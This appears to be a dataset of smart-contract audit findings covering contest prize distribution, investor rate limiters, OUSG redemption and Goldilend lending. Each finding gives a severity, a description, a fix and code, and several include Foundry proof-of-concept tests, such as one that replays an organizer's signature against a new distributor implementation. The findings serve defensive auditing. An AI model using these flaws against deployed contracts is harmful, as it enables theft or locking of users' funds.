The same signature can be used with different `distribute` implementations, allowing the caller who owns the signature to `distribute` on unauthorized implementations.\\nThe ProxyFactory::setContest() function configures a `closeTime` for a specific `organizer`, `contestId` and `implementation`.\\n```\\nFile: ProxyFactory.sol\\n function setContest(address organizer, bytes32 contestId, uint256 closeTime, address implementation)\\n public\\n onlyOwner\\n// rest of code\\n// rest of code\\n bytes32 salt = _calculateSalt(organizer, contestId, implementation);\\n if (saltToCloseTime[salt] != 0) revert ProxyFactory__ContestIsAlreadyRegistered();\\n saltToCloseTime[salt] = closeTime;\\n```\\n\\nThe caller who owns the signature can distribute prizes to winners using the deployProxyAndDistributeBySignature() function. The problem is that the signed hash (line 159) does not include the `implementation` parameter.\\n```\\nFile: ProxyFactory.sol\\n function deployProxyAndDistributeBySignature(\\n address organizer,\\n bytes32 contestId,\\n address implementation,\\n bytes calldata signature,\\n bytes calldata data\\n ) public returns (address) {\\n bytes32 digest = _hashTypedDataV4(keccak256(abi.encode(contestId, data)));\\n if (ECDSA.recover(digest, signature) != organizer) revert ProxyFactory__InvalidSignature();\\n bytes32 salt = _calculateSalt(organizer, contestId, implementation);\\n if (saltToCloseTime[salt] == 0) revert ProxyFactory__ContestIsNotRegistered();\\n if (saltToCloseTime[salt] > block.timestamp) revert ProxyFactory__ContestIsNotClosed();\\n address proxy = _deployProxy(organizer, contestId, implementation);\\n _distribute(proxy, data);\\n return proxy;\\n }\\n```\\n\\nFor some reason, there could be a different `distribution` implementation for the same `contestId`. The caller who owns the signature can then distribute even though the organizer never authorized a signature for the new implementation.\\nI created a test where the caller who owns a signature can distribute through a new `distribute implementation` using the same signature. Test steps:\\nOwner setContest using the implementation `address(distributor)`\\nOrganizer creates a signature.\\nCaller distributes prizes using the signature.\\nFor some reason there is a new distributor implementation. The Owner sets the new distributor for the same `contestId`.\\nThe caller can distribute prizes using the same signature created in step 2 with a different distributor implementation.\\n```\\n// test/integration/ProxyFactoryTest.t.sol:ProxyFactoryTest\\n// $ forge test --match-test "testSignatureCanBeUsedToNewImplementation" -vvv\\n//\\n function testSignatureCanBeUsedToNewImplementation() public {\\n address organizer = TEST_SIGNER;\\n bytes32 contestId = keccak256(abi.encode("Jason", "001"));\\n //\\n // 1. Owner setContest using address(distributor)\\n vm.startPrank(factoryAdmin);\\n proxyFactory.setContest(organizer, contestId, block.timestamp + 8 days, address(distributor));\\n vm.stopPrank();\\n bytes32 salt = keccak256(abi.encode(organizer, contestId, address(distributor)));\\n address proxyAddress = proxyFactory.getProxyAddress(salt, address(distributor));\\n vm.startPrank(sponsor);\\n MockERC20(jpycv2Address).transfer(proxyAddress, 10000 ether);\\n vm.stopPrank();\\n assertEq(MockERC20(jpycv2Address).balanceOf(proxyAddress), 10000 ether);\\n // before\\n assertEq(MockERC20(jpycv2Address).balanceOf(user1), 0 ether);\\n assertEq(MockERC20(jpycv2Address).balanceOf(stadiumAddress), 0 ether);\\n //\\n // 2. Organizer creates a signature\\n (bytes32 digest, bytes memory sendingData, bytes memory signature) = createSignatureByASigner(TEST_SIGNER_KEY);\\n assertEq(ECDSA.recover(digest, signature), TEST_SIGNER);\\n vm.warp(8.01 days);\\n //\\n // 3. Caller distributes prizes using the signature\\n proxyFactory.deployProxyAndDistributeBySignature(\\n TEST_SIGNER, contestId, address(distributor), signature, sendingData\\n );\\n // after\\n assertEq(MockERC20(jpycv2Address).balanceOf(user1), 9500 ether);\\n assertEq(MockERC20(jpycv2Address).balanceOf(stadiumAddress), 500 ether);\\n //\\n // 4. For some reason there is a new distributor implementation.\\n // The Owner set the new distributor for the same contestId\\n Distributor new_distributor = new Distributor(address(proxyFactory), stadiumAddress);\\n vm.startPrank(factoryAdmin);\\n proxyFactory.setContest(organizer, contestId, block.timestamp + 8 days, address(new_distributor));\\n vm.stopPrank();\\n bytes32 newDistributorSalt = keccak256(abi.encode(organizer, contestId, address(new_distributor)));\\n address proxyNewDistributorAddress = proxyFactory.getProxyAddress(newDistributorSalt, address(new_distributor));\\n vm.startPrank(sponsor);\\n MockERC20(jpycv2Address).transfer(proxyNewDistributorAddress, 10000 ether);\\n vm.stopPrank();\\n //\\n // 5. The caller can distribute prizes using the same signature in different distributor implementation\\n vm.warp(20 days);\\n proxyFactory.deployProxyAndDistributeBySignature(\\n TEST_SIGNER, contestId, address(new_distributor), signature, sendingData\\n );\\n }\\n```\\n
Include the distribution `implementation` in the signature hash.\\n```\\n function deployProxyAndDistributeBySignature(\\n address organizer,\\n bytes32 contestId,\\n address implementation,\\n bytes calldata signature,\\n bytes calldata data\\n ) public returns (address) {\\n// Remove the line below\\n bytes32 digest = _hashTypedDataV4(keccak256(abi.encode(contestId, data)));\\n// Add the line below\\n bytes32 digest = _hashTypedDataV4(keccak256(abi.encode(contestId, implementation, data)));\\n```\\n
The caller who owns the signature can distribute the prizes through a new distribution implementation using the same signature that was created for an old implementation. The `organizer` must create a new signature whenever there is a new implementation for the same `contestId`: an authorized signature is for one distribution implementation, not for future implementations.\\nTools used\\nManual review
```\\nFile: ProxyFactory.sol\\n function setContest(address organizer, bytes32 contestId, uint256 closeTime, address implementation)\\n public\\n onlyOwner\\n// rest of code\\n// rest of code\\n bytes32 salt = _calculateSalt(organizer, contestId, implementation);\\n if (saltToCloseTime[salt] != 0) revert ProxyFactory__ContestIsAlreadyRegistered();\\n saltToCloseTime[salt] = closeTime;\\n```\\n
Blacklisted STADIUM_ADDRESS address cause fund stuck in the contract forever
medium
The vulnerability relates to the immutability of `STADIUM_ADDRESS`. If this address is blacklisted by the token used for rewards, the system becomes unable to make transfers, leading to funds being stuck in the contract indefinitely.\\nOwner calls `setContest` with the correct `salt`.\\nThe Organizer sends USDC as rewards to a pre-determined Proxy address.\\n`STADIUM_ADDRESS` is blacklisted by the USDC operator.\\nWhen the contest is closed, the Organizer calls `deployProxyAndDistribute` with the registered `contestId` and `implementation` to deploy a proxy and distribute rewards. However, the call to `Distributor._commissionTransfer` reverts at Line 164 due to the blacklisting.\\nUSDC held at the Proxy contract becomes stuck forever.\\n```\\n// Findings are labeled with '<= FOUND'\\n// File: src/Distributor.sol\\n function _distribute(address token, address[] memory winners, uint256[] memory percentages, bytes memory data)\\n // rest of code\\n _commissionTransfer(erc20);// <= FOUND\\n // rest of code\\n }\\n // rest of code\\n function _commissionTransfer(IERC20 token) internal {\\n token.safeTransfer(STADIUM_ADDRESS, token.balanceOf(address(this)));// <= FOUND: Blacklisted STADIUM_ADDRESS address cause fund stuck in the contract forever\\n }\\n```\\n
It is recommended to allow `STADIUM_ADDRESS` to be updatable by a dedicated admin role to avoid token transfer blacklisting. Moreover, since `STADIUM_ADDRESS` is no longer `immutable`, `storage` collision should be taken into account.
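A minimal sketch of the suggested mitigation (the `onlyFactoryAdmin` modifier and the error name are illustrative assumptions, not existing code):\\n```\\n address public stadiumAddress; // replaces the immutable STADIUM_ADDRESS\\n\\n function setStadiumAddress(address newStadium) external onlyFactoryAdmin {\\n if (newStadium == address(0)) revert Distributor__NoZeroAddress();\\n stadiumAddress = newStadium;\\n }\\n```\\nThis would let the protocol swap in a fresh address if the current one is blacklisted, at the cost of the storage-layout care noted above.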
A blacklisted `STADIUM_ADDRESS` would lead to funds being locked at the Proxy address permanently: funds are already held in the Proxy, and the Proxy's `_implementation` cannot be changed once deployed. Even the `ProxyFactory.distributeByOwner()` function cannot rescue the funds because it hits the same revert.
```\\n// Findings are labeled with '<= FOUND'\\n// File: src/Distributor.sol\\n function _distribute(address token, address[] memory winners, uint256[] memory percentages, bytes memory data)\\n // rest of code\\n _commissionTransfer(erc20);// <= FOUND\\n // rest of code\\n }\\n // rest of code\\n function _commissionTransfer(IERC20 token) internal {\\n token.safeTransfer(STADIUM_ADDRESS, token.balanceOf(address(this)));// <= FOUND: Blacklisted STADIUM_ADDRESS address cause fund stuck in the contract forever\\n }\\n```\\n
`InvestorBasedRateLimiter::setInvestorMintLimit` and `setInvestorRedemptionLimit` can make subsequent calls to `checkAndUpdateMintLimit` and `checkAndUpdateRedemptionLimit` revert due to underflow
low
`InvestorBasedRateLimiter::_checkAndUpdateRateLimitState` L211-213 subtracts the current mint/redemption amount from the corresponding limit:\\n```\\nif (amount > rateLimit.limit - rateLimit.currentAmount) {\\n revert RateLimitExceeded();\\n}\\n```\\n\\nIf `setInvestorMintLimit` or `setInvestorRedemptionLimit` are used to set the limit amount for minting or redemptions smaller than the current mint/redemption amount, calls to this function will revert due to underflow.
Explicitly handle the case where the limit is smaller than the current mint/redemption amount:\\n```\\nif (rateLimit.limit <= rateLimit.currentAmount || amount > rateLimit.limit - rateLimit.currentAmount) {\\n revert RateLimitExceeded();\\n}\\n```\\n
`InvestorBasedRateLimiter::setInvestorMintLimit` and `setInvestorRedemptionLimit` can make subsequent calls to `checkAndUpdateMintLimit` and `checkAndUpdateRedemptionLimit` revert due to underflow.\\nProof of Concept: Add this drop-in PoC to forge-tests/ousg/InvestorBasedRateLimiter/setters.t.sol:\\n```\\nfunction test_setInvestorMintLimit_underflow_DoS() public initDefault(alice) {\\n // first perform a mint\\n uint256 mintAmount = rateLimiter.defaultMintLimit();\\n vm.prank(client);\\n rateLimiter.checkAndUpdateMintLimit(alice, mintAmount);\\n\\n // admin now reduces the mint limit to be under the current\\n // minted amount\\n uint256 aliceInvestorId = 1;\\n uint256 newMintLimit = mintAmount - 1;\\n vm.prank(guardian);\\n rateLimiter.setInvestorMintLimit(aliceInvestorId, newMintLimit);\\n\\n // subsequent calls to `checkAndUpdateMintLimit` revert due to underflow\\n vm.prank(client);\\n rateLimiter.checkAndUpdateMintLimit(alice, 1);\\n\\n // same issue affects `setInvestorRedemptionLimit`\\n}\\n```\\n\\nRun with: `forge test --match-test test_setInvestorMintLimit_underflow_DoS`\\nProduces output:\\n```\\nRan 1 test for forge-tests/ousg/InvestorBasedRateLimiter/setters.t.sol:Test_InvestorBasedRateLimiter_setters_ETH\\n[FAIL. Reason: panic: arithmetic underflow or overflow (0x11)] test_setInvestorMintLimit_underflow_DoS() (gas: 264384)\\nSuite result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 1.09ms (116.74µs CPU time)\\n```\\n
```\\nif (amount > rateLimit.limit - rateLimit.currentAmount) {\\n revert RateLimitExceeded();\\n}\\n```\\n
Prevent creating an investor record associated with no address
low
`InvestorBasedRateLimiter::initializeInvestorStateDefault` is supposed to associate a newly created investor with one or more addresses, but the `for` loop which does this can be bypassed by calling the function with an empty array:\\n```\\nfunction initializeInvestorStateDefault(\\n address[] memory addresses\\n ) external onlyRole(CONFIGURER_ROLE) {\\n _initializeInvestorState(\\n addresses,\\n defaultMintLimit,\\n defaultRedemptionLimit,\\n defaultMintLimitDuration,\\n defaultRedemptionLimitDuration\\n );\\n}\\n\\nfunction _initializeInvestorState(\\n address[] memory addresses,\\n uint256 mintLimit,\\n uint256 redemptionLimit,\\n uint256 mintLimitDuration,\\n uint256 redemptionLimitDuration\\n ) internal {\\n uint256 investorId = ++investorIdCounter;\\n\\n // @audit this `for` loop can be bypassed by calling\\n // `initializeInvestorStateDefault` with an empty array\\n for (uint256 i = 0; i < addresses.length; ++i) {\\n // Safety check to ensure the address is not already associated with an investor\\n // before associating it with a new investor\\n if (addressToInvestorId[addresses[i]] != 0) {\\n revert AddressAlreadyAssociated();\\n }\\n _setAddressToInvestorId(addresses[i], investorId);\\n }\\n\\n investorIdToMintState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: mintLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: mintLimitDuration\\n });\\n investorIdToRedemptionState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: redemptionLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: redemptionLimitDuration\\n });\\n}\\n```\\n
In `_initializeInvestorState` revert if the input address array is empty:\\n```\\nuint256 addressesLength = addresses.length;\\n\\nif(addressesLength == 0) revert EmptyAddressArray();\\n```\\n
An investor record can be created without any associated address. This breaks the following invariant of the `InvestorBasedRateLimiter` contract:\\nwhen a new `investorId` is created, it should be associated with one or more valid addresses\\nProof of Concept: Add this drop-in PoC to forge-tests/ousg/InvestorBasedRateLimiter/setters.t.sol:\\n```\\nfunction test_initializeInvestor_NoAddress() public {\\n // no investor created\\n assertEq(0, rateLimiter.investorIdCounter());\\n\\n // empty input array will bypass the `for` loop that is supposed\\n // to associate addresses to the newly created investor\\n address[] memory addresses;\\n\\n vm.prank(guardian);\\n rateLimiter.initializeInvestorStateDefault(addresses);\\n\\n // one investor created\\n assertEq(1, rateLimiter.investorIdCounter());\\n\\n // not associated with any addresses\\n assertEq(0, rateLimiter.investorAddressCount(1));\\n}\\n```\\n\\nRun with: `forge test --match-test test_initializeInvestor_NoAddress`
```\\nfunction initializeInvestorStateDefault(\\n address[] memory addresses\\n ) external onlyRole(CONFIGURER_ROLE) {\\n _initializeInvestorState(\\n addresses,\\n defaultMintLimit,\\n defaultRedemptionLimit,\\n defaultMintLimitDuration,\\n defaultRedemptionLimitDuration\\n );\\n}\\n\\nfunction _initializeInvestorState(\\n address[] memory addresses,\\n uint256 mintLimit,\\n uint256 redemptionLimit,\\n uint256 mintLimitDuration,\\n uint256 redemptionLimitDuration\\n ) internal {\\n uint256 investorId = ++investorIdCounter;\\n\\n // @audit this `for` loop can be bypassed by calling\\n // `initializeInvestorStateDefault` with an empty array\\n for (uint256 i = 0; i < addresses.length; ++i) {\\n // Safety check to ensure the address is not already associated with an investor\\n // before associating it with a new investor\\n if (addressToInvestorId[addresses[i]] != 0) {\\n revert AddressAlreadyAssociated();\\n }\\n _setAddressToInvestorId(addresses[i], investorId);\\n }\\n\\n investorIdToMintState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: mintLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: mintLimitDuration\\n });\\n investorIdToRedemptionState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: redemptionLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: redemptionLimitDuration\\n });\\n}\\n```\\n
`InstantMintTimeBasedRateLimiter::_setInstantMintLimit` and `_setInstantRedemptionLimit` can make subsequent calls to `_checkAndUpdateInstantMintLimit` and `_checkAndUpdateInstantRedemptionLimit` revert due to underflow
low
`InstantMintTimeBasedRateLimiter::_checkAndUpdateInstantMintLimit` L103-106 subtracts the currently minted amount from the mint limit:\\n```\\nrequire(\\n amount <= instantMintLimit - currentInstantMintAmount,\\n "RateLimit: Mint exceeds rate limit"\\n);\\n```\\n\\nIf `_setInstantMintLimit` is used to set `instantMintLimit < currentInstantMintAmount`, subsequent calls to this function will revert due to the underflow. The same is true for `_setInstantRedemptionLimit` and `_checkAndUpdateInstantRedemptionLimit`.
Explicitly handle the case where the limit is smaller than the current mint/redemption amount:\\n```\\nfunction _checkAndUpdateInstantMintLimit(uint256 amount) internal {\\n require(\\n instantMintLimit > currentInstantMintAmount && amount <= instantMintLimit - currentInstantMintAmount,\\n "RateLimit: Mint exceeds rate limit"\\n );\\n}\\n\\nfunction _checkAndUpdateInstantRedemptionLimit(uint256 amount) internal {\\n require(\\n instantRedemptionLimit > currentInstantRedemptionAmount && amount <= instantRedemptionLimit - currentInstantRedemptionAmount,\\n "RateLimit: Redemption exceeds rate limit"\\n );\\n}\\n```\\n
`InstantMintTimeBasedRateLimiter::_setInstantMintLimit` and `_setInstantRedemptionLimit` can make subsequent calls to `_checkAndUpdateInstantMintLimit` and `_checkAndUpdateInstantRedemptionLimit` revert due to underflow.
```\\nrequire(\\n amount <= instantMintLimit - currentInstantMintAmount,\\n "RateLimit: Mint exceeds rate limit"\\n);\\n```\\n
Protocol may be short-changed by `BuidlRedeemer` during a USDC depeg event
low
`OUSGInstantManager::_redeemBUIDL` assumes that 1 BUIDL = 1 USDC, as it enforces receiving 1 USDC for every 1 BUIDL it redeems:\\n```\\nuint256 usdcBalanceBefore = usdc.balanceOf(address(this));\\nbuidl.approve(address(buidlRedeemer), buidlAmountToRedeem);\\nbuidlRedeemer.redeem(buidlAmountToRedeem);\\nrequire(\\n usdc.balanceOf(address(this)) == usdcBalanceBefore + buidlAmountToRedeem,\\n "OUSGInstantManager::_redeemBUIDL: BUIDL:USDC not 1:1"\\n);\\n```\\n\\nIn the event of a USDC depeg (especially a sustained one), `BUIDLRedeemer` should return more than a 1:1 ratio: 1 USDC would no longer be worth $1, so 1 BUIDL != 1 USDC and the protocol's BUIDL is worth more USDC than it receives. However `BUIDLRedeemer` does not do this; it only ever returns 1:1.
To prevent this situation the protocol would need to use an oracle to check whether USDC had depegged and, if so, calculate the amount of USDC it should receive in exchange for its BUIDL. If it is short-changed, it would either have to revert (preventing redemptions) or allow the redemption, record the short-changed amount in storage, and implement an off-chain process with BlackRock to recover it.\\nAlternatively the protocol may simply accept the risk of being willingly short-changed during a USDC depeg in order to allow redemptions to continue.
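A hedged sketch of the oracle-based variant (the `usdcOracle` feed and `MIN_USDC_PRICE` constant are illustrative assumptions, not part of the OUSG codebase):\\n```\\n // assumes usdcOracle is a Chainlink USDC/USD feed (8 decimals)\\n (, int256 usdcPrice,, uint256 updatedAt,) = usdcOracle.latestRoundData();\\n require(usdcPrice > 0 && block.timestamp - updatedAt <= 1 days, "stale USDC oracle");\\n // block redemptions while USDC trades below the accepted peg band, e.g. 0.995e8\\n require(uint256(usdcPrice) >= MIN_USDC_PRICE, "USDC depegged");\\n```\\n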
In the event of a USDC depeg the protocol will be short-changed by `BuidlRedeemer` since it will happily receive only 1 USDC for every 1 BUIDL redeemed, even though the value of 1 BUIDL would be greater than the value of 1 USDC due to the USDC depeg.
```\\nuint256 usdcBalanceBefore = usdc.balanceOf(address(this));\\nbuidl.approve(address(buidlRedeemer), buidlAmountToRedeem);\\nbuidlRedeemer.redeem(buidlAmountToRedeem);\\nrequire(\\n usdc.balanceOf(address(this)) == usdcBalanceBefore + buidlAmountToRedeem,\\n "OUSGInstantManager::_redeemBUIDL: BUIDL:USDC not 1:1"\\n);\\n```\\n
Consider allowing `ROUSG::burn` to burn dust amounts
low
`ROUSG::burn` is used by admins to burn `rOUSG` tokens from any account for regulatory reasons.\\nIt does not allow burning a share amount smaller than 1e4, because this is less than a wei of `OUSG`.\\n```\\nif (ousgSharesAmount < OUSG_TO_ROUSG_SHARES_MULTIPLIER)\\n revert UnwrapTooSmall();\\n```\\n\\nDepending on the current and future regulatory situation it could be necessary to always be able to burn all shares from users.
Consider allowing the `burn` function to `burn` all remaining shares even if under the minimum amount.
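A minimal sketch of the relaxed check (assuming the stETH-style `sharesOf` accessor available in `rOUSG`; the exact burn flow may differ):\\n```\\n // allow a regulatory burn to clear an account completely, even dust\\n if (\\n ousgSharesAmount < OUSG_TO_ROUSG_SHARES_MULTIPLIER &&\\n ousgSharesAmount != sharesOf(_account)\\n ) revert UnwrapTooSmall();\\n```\\n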
null
```\\nif (ousgSharesAmount < OUSG_TO_ROUSG_SHARES_MULTIPLIER)\\n revert UnwrapTooSmall();\\n```\\n
`Goldilend.lock()` will always revert
high
In `lock()`, `_refreshiBGT()` is called before the user's `iBGT` is pulled in, so the contract does not yet hold the tokens when `iBGTVault(ibgtVault).stake()` runs and the call reverts.\\n```\\n function lock(uint256 amount) external {\\n uint256 mintAmount = _GiBGTMintAmount(amount);\\n poolSize += amount;\\n _refreshiBGT(amount); //@audit should call after depositing funds\\n SafeTransferLib.safeTransferFrom(ibgt, msg.sender, address(this), amount);\\n _mint(msg.sender, mintAmount);\\n emit iBGTLock(msg.sender, amount);\\n }\\n// rest of code\\n function _refreshiBGT(uint256 ibgtAmount) internal {\\n ERC20(ibgt).approve(ibgtVault, ibgtAmount);\\n iBGTVault(ibgtVault).stake(ibgtAmount); //@audit will revert here\\n }\\n```\\n
`_refreshiBGT()` should be called after pulling funds from the user.
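A minimal sketch of the reordered `lock()`:\\n```\\n function lock(uint256 amount) external {\\n uint256 mintAmount = _GiBGTMintAmount(amount);\\n poolSize += amount;\\n // pull the user's iBGT first so the vault stake has tokens to pull\\n SafeTransferLib.safeTransferFrom(ibgt, msg.sender, address(this), amount);\\n _refreshiBGT(amount);\\n _mint(msg.sender, mintAmount);\\n emit iBGTLock(msg.sender, amount);\\n }\\n```\\n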
Users can't lock `iBGT` as `lock()` always reverts.
```\\n function lock(uint256 amount) external {\\n uint256 mintAmount = _GiBGTMintAmount(amount);\\n poolSize += amount;\\n _refreshiBGT(amount); //@audit should call after depositing funds\\n SafeTransferLib.safeTransferFrom(ibgt, msg.sender, address(this), amount);\\n _mint(msg.sender, mintAmount);\\n emit iBGTLock(msg.sender, amount);\\n }\\n// rest of code\\n function _refreshiBGT(uint256 ibgtAmount) internal {\\n ERC20(ibgt).approve(ibgtVault, ibgtAmount);\\n iBGTVault(ibgtVault).stake(ibgtAmount); //@audit will revert here\\n }\\n```\\n
Wrong `PoolSize` increment in `Goldilend.repay()`
high
When a user repays a loan using `repay()`, the function increases `poolSize` by the pool's share of the repaid interest, but it uses the wrong amount in the increment.\\n```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\n uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio);\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? outstandingDebt : repayAmount - interest;\\n loans[msg.sender][_userLoanId].borrowedAmount -= repayAmount;\\n loans[msg.sender][_userLoanId].interest -= interest;\\n poolSize += userLoan.interest * (1000 - (multisigShare + apdaoShare)) / 1000; //@audit should use interest instead of userLoan.interest\\n// rest of code\\n }\\n```\\n\\nIt should use `interest` instead of `userLoan.interest`, because the user repaid only `interest`, not the loan's full outstanding interest.
`poolSize` should be updated using `interest`.
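The one-line fix, following the diff convention used elsewhere in this report:\\n```\\n- poolSize += userLoan.interest * (1000 - (multisigShare + apdaoShare)) / 1000;\\n+ poolSize += interest * (1000 - (multisigShare + apdaoShare)) / 1000;\\n```\\n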
`poolSize` would be tracked wrongly after calling `repay()` and several functions wouldn't work as expected.
```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\n uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio);\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? outstandingDebt : repayAmount - interest;\\n loans[msg.sender][_userLoanId].borrowedAmount -= repayAmount;\\n loans[msg.sender][_userLoanId].interest -= interest;\\n poolSize += userLoan.interest * (1000 - (multisigShare + apdaoShare)) / 1000; //@audit should use interest instead of userLoan.interest\\n// rest of code\\n }\\n```\\n
Users can extend an expired boost using invalidated NFTs.
high
In `Goldilend.sol#L251`, a user can extend a boost with invalidated NFTs.\\nThe user has created a boost with a valid NFT.\\nAfter that, the NFT was invalidated using `adjustBoosts()`.\\nAfter the original boost is expired, the user can just call `boost()` with empty arrays, and the boost will be extended again with the original magnitude.\\n```\\n function _buildBoost(\\n address[] calldata partnerNFTs,\\n uint256[] calldata partnerNFTIds\\n ) internal returns (Boost memory newUserBoost) {\\n uint256 magnitude;\\n Boost storage userBoost = boosts[msg.sender];\\n if(userBoost.expiry == 0) {\\n// rest of code\\n }\\n else {\\n address[] storage nfts = userBoost.partnerNFTs;\\n uint256[] storage ids = userBoost.partnerNFTIds;\\n magnitude = userBoost.boostMagnitude; //@audit use old magnitude without checking\\n for (uint256 i = 0; i < partnerNFTs.length; i++) {\\n magnitude += partnerNFTBoosts[partnerNFTs[i]];\\n nfts.push(partnerNFTs[i]);\\n ids.push(partnerNFTIds[i]);\\n }\\n newUserBoost = Boost({\\n partnerNFTs: nfts,\\n partnerNFTIds: ids,\\n expiry: block.timestamp + boostLockDuration,\\n boostMagnitude: magnitude\\n });\\n }\\n }\\n```\\n
Whenever users extend their boosts, their NFTs should be evaluated again.
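A minimal sketch of the fix inside `_buildBoost()`: recompute the magnitude from the stored NFTs at their current boost values instead of reusing the cached figure:\\n```\\n else {\\n address[] storage nfts = userBoost.partnerNFTs;\\n uint256[] storage ids = userBoost.partnerNFTIds;\\n // re-price every previously deposited NFT; an invalidated collection now adds 0\\n magnitude = 0;\\n for (uint256 i = 0; i < nfts.length; i++) {\\n magnitude += partnerNFTBoosts[nfts[i]];\\n }\\n for (uint256 i = 0; i < partnerNFTs.length; i++) {\\n magnitude += partnerNFTBoosts[partnerNFTs[i]];\\n nfts.push(partnerNFTs[i]);\\n ids.push(partnerNFTIds[i]);\\n }\\n// rest of code\\n }\\n```\\n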
Malicious users can use invalidated NFTs to extend their boosts forever.
```\\n function _buildBoost(\\n address[] calldata partnerNFTs,\\n uint256[] calldata partnerNFTIds\\n ) internal returns (Boost memory newUserBoost) {\\n uint256 magnitude;\\n Boost storage userBoost = boosts[msg.sender];\\n if(userBoost.expiry == 0) {\\n// rest of code\\n }\\n else {\\n address[] storage nfts = userBoost.partnerNFTs;\\n uint256[] storage ids = userBoost.partnerNFTIds;\\n magnitude = userBoost.boostMagnitude; //@audit use old magnitude without checking\\n for (uint256 i = 0; i < partnerNFTs.length; i++) {\\n magnitude += partnerNFTBoosts[partnerNFTs[i]];\\n nfts.push(partnerNFTs[i]);\\n ids.push(partnerNFTIds[i]);\\n }\\n newUserBoost = Boost({\\n partnerNFTs: nfts,\\n partnerNFTIds: ids,\\n expiry: block.timestamp + boostLockDuration,\\n boostMagnitude: magnitude\\n });\\n }\\n }\\n```\\n
Team members can never unstake their initial allocation.
high
When users call `unstake()`, the vested amount is calculated using `_vestingCheck()`.\\n```\\n function _vestingCheck(address user, uint256 amount) internal view returns (uint256) {\\n if(teamAllocations[user] > 0) return 0; //@audit return 0 for team members\\n uint256 initialAllocation = seedAllocations[user];\\n if(initialAllocation > 0) {\\n if(block.timestamp < vestingStart) return 0;\\n uint256 vestPortion = FixedPointMathLib.divWad(block.timestamp - vestingStart, vestingEnd - vestingStart);\\n return FixedPointMathLib.mulWad(vestPortion, initialAllocation) - (initialAllocation - stakedLocks[user]);\\n }\\n else {\\n return amount;\\n }\\n }\\n```\\n\\nBut it returns 0 for team members, so they can never unstake. Furthermore, `stake()` only blocks seed investors, not team members, so any additional amount a team member stakes is locked as well.
`_vestingCheck` should apply the same vesting logic to team members as it does to seed investors.
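A minimal sketch of `_vestingCheck()` applying the seed-investor schedule to team allocations as well (this assumes team and seed vesting share the same `vestingStart`/`vestingEnd`; a separate team schedule would need its own branch):\\n```\\n function _vestingCheck(address user, uint256 amount) internal view returns (uint256) {\\n uint256 initialAllocation = seedAllocations[user] + teamAllocations[user];\\n if(initialAllocation > 0) {\\n if(block.timestamp < vestingStart) return 0;\\n uint256 vestPortion = FixedPointMathLib.divWad(block.timestamp - vestingStart, vestingEnd - vestingStart);\\n return FixedPointMathLib.mulWad(vestPortion, initialAllocation) - (initialAllocation - stakedLocks[user]);\\n }\\n return amount;\\n }\\n```\\n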
Team members can never unstake.
```\\n function _vestingCheck(address user, uint256 amount) internal view returns (uint256) {\\n if(teamAllocations[user] > 0) return 0; //@audit return 0 for team members\\n uint256 initialAllocation = seedAllocations[user];\\n if(initialAllocation > 0) {\\n if(block.timestamp < vestingStart) return 0;\\n uint256 vestPortion = FixedPointMathLib.divWad(block.timestamp - vestingStart, vestingEnd - vestingStart);\\n return FixedPointMathLib.mulWad(vestPortion, initialAllocation) - (initialAllocation - stakedLocks[user]);\\n }\\n else {\\n return amount;\\n }\\n }\\n```\\n
In `GovLocks`, it shouldn't use a `deposits` mapping
high
In `GovLocks`, it tracks every user's deposit amount using a `deposits` mapping. As users can transfer `govLocks` freely, they might have fewer `deposits` than their `govLocks` balance and wouldn't be able to withdraw when they want.\\n```\\n function deposit(uint256 amount) external {\\n deposits[msg.sender] += amount; //@audit no need\\n _moveDelegates(address(0), delegates[msg.sender], amount);\\n SafeTransferLib.safeTransferFrom(locks, msg.sender, address(this), amount);\\n _mint(msg.sender, amount);\\n }\\n\\n /// @notice Withdraws Locks to burn Govlocks\\n /// @param amount Amount of Locks to withdraw\\n function withdraw(uint256 amount) external {\\n deposits[msg.sender] -= amount; //@audit no need\\n _moveDelegates(delegates[msg.sender], address(0), amount);\\n _burn(msg.sender, amount);\\n SafeTransferLib.safeTransfer(locks, msg.sender, amount);\\n }\\n```\\n\\nHere is a possible scenario.\\nAlice has deposited 100 `LOCKS` and got 100 `govLOCKS`. Also `deposits[Alice] = 100`.\\nBob bought 50 `govLOCKS` from Alice to get voting power.\\nWhen Bob tries to call `withdraw()`, it will revert because `deposits[Bob] = 0` although he has 50 `govLOCKS`.
We don't need to use the `deposits` mapping at all and we can just rely on `govLocks` balances.
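A minimal sketch of `deposit()`/`withdraw()` with the mapping removed; `_burn()` already reverts if the caller holds fewer govLOCKS than `amount`, so no extra accounting is needed:\\n```\\n function deposit(uint256 amount) external {\\n _moveDelegates(address(0), delegates[msg.sender], amount);\\n SafeTransferLib.safeTransferFrom(locks, msg.sender, address(this), amount);\\n _mint(msg.sender, amount);\\n }\\n\\n function withdraw(uint256 amount) external {\\n _moveDelegates(delegates[msg.sender], address(0), amount);\\n _burn(msg.sender, amount); // reverts unless msg.sender holds >= amount govLOCKS\\n SafeTransferLib.safeTransfer(locks, msg.sender, amount);\\n }\\n```\\n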
Users wouldn't be able to withdraw `LOCKS` with `govLOCKS`.
